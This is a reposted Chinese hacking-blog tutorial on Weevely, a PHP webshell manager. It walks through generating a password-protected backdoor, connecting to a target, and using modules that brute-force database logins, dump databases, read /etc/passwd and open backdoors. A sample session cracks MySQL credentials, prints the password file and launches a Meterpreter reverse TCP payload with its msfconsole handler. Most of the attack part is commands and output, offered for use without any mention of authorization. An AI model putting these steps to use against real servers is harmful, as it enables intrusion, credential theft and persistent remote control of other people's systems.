Weevely是一款python编写的webshell管理工具,作为编写语言使用python的一款工具,它最大的优点就在于跨平台,可以算作是linux下的一款菜刀替代工具(限于php),总的来说还是非常不错的一款工具,具体的项目地址[1]。
root@kali:~# weevely [+] weevely 3.2.0 [!] Error: too few arguments [+] Run terminal to the target weevely <URL> <password> [cmd] [+] Load session file weevely session <path> [cmd] [+] Generate backdoor agent weevely generate <password> <path>
root@kali:~# weevely generate test hello.php Generated backdoor with password 'test' in 'hello.php' of 1486 byte size. root@kali:~# find / -name hello.php /usr/share/weevely/hello.php
目前支持的后门格式主要是php :generate.php(生成php后门文件) :generate.img(将后门代码插入到图片中,并修改.htaccess,该后门需要服务器开启.htaccess) :generate.htaccess(将后门代码插入到.htaccess,同样需要开启.htaccess支持)
root@kali:~# weevely http://192.168.110.129/hello.php test [+] weevely 3.2.0 [+] Target: winxp-0947be9ad:C:\phpstudy\WWW [+] Session: /root/.weevely/sessions/192.168.110.129/hello_0.session [+] Shell: System shell [+] Browse the filesystem or execute commands starts the connection [+] to the target. Type :help for more information. weevely>shell
在虚拟终端模式下需要使用模块直接在前面加上 ’:’ 即可,或者用:help查看帮助详情
module | description |
---|---|
:audit.etcpasswd | 枚举/etc/passwd |
:audit.userfiles | 列举用户/home下具有权限的文件 |
:audit.mapwebfiles | 枚举任意Web站点的URL链接 |
:shell.php | 编写php文件 |
:shell.sh | 编写系统脚本 |
:system.info | 收集系统信息 |
:find.suidsgid | 查找SUID / SGID文件和目录 |
:find.perms | 查找权限可读/写/可执行文件和目录 |
:backdoor.tcp | TCP端口后门 |
:backdoor.reversetcp | 反弹TCP连接 |
:bruteforce.sql | 爆破指定数据库用户名密码 |
:bruteforce.sqlusers | 爆破所有数据库用户密码 |
:file.upload | 上传本地文件 |
:file.upload2web | 上传二进制/ ASCII文件至目标站点文件夹并枚举URL |
:file.enum | 在本地词表的书面枚举远程文件 |
:file.read | 读文件 |
:file.rm | 删除文件 |
:file.check | 检查远程文件的状态(md5值,大小,权限等) |
:file.download | 下载远程二进制/ ASCII文件到本地 |
:sql.console | 启动SQL控制台 |
:sql.dump | 备份数据库,即脱库 |
:net.scan | 端口扫描 |
:net.phpproxy | 安装远程php代理 |
:net.ifaces | 显示远程主机网络接口信息 |
:net.proxy | 安装隧道通信代理 |
用户名为roblast micjanost pjgomes pdpeers root :bruteforce_sql mysql -users roblast micjanost pjgomes pdpeers root -fpwds wordlists/huge.txt 使用:sql_console连接数据库 www-data@target:/var/www/html PHP> :sql_console -u root -p Gilchrist root@localhost SQL> show databases; +--------------------+ | mysql | | performance_schema | | test | | appdb | +--------------------+ root@localhost SQL>
www-data@target:/var/www/html PHP> :audit_etcpasswd root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/usr/sbin/nologin man:x:6:12:man:/var/cache/man:/usr/sbin/nologin lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin mail:x:8:8:mail:/var/mail:/usr/sbin/nologin news:x:9:9:news:/var/spool/news:/usr/sbin/nologin uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin proxy:x:13:13:proxy:/bin:/usr/sbin/nologin www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin backup:x:34:34:backup:/var/backups:/usr/sbin/nologin yzer:x:1000:1000:yzer,,,:/home/yzer:/bin/bash www-data@target:/var/www/html PHP>
# 执行该命令会自动生成msf的payload :backdoor_meterpreter -payload php/meterpreter/reverse_tcp -lhost 10.0.0.2 [-][meterpreter] Make sure the listener is running on another terminal as below msfconsole -x "use exploit/multi/handler; set PAYLOAD php/meterpreter/reverse_tcp; set LHOST 10.0.0.2;
[1]
Weevely项目地址: "https://github.com/epinna/Weevely"
为你铺好的HACKWAY
长按扫码上车
你点的每个在看,我都认真当成了喜欢
本文分享自微信公众号 - HACKWAY(gh_7a5a315cde00),作者:HACKWAY
原文出处及转载信息见文内详细说明,如有侵权,请联系 yunjia_community@tencent.com 删除。
原始发表时间:2020-08-20
本文参与腾讯云自媒体分享计划,欢迎正在阅读的你也加入,一起分享。
我来说两句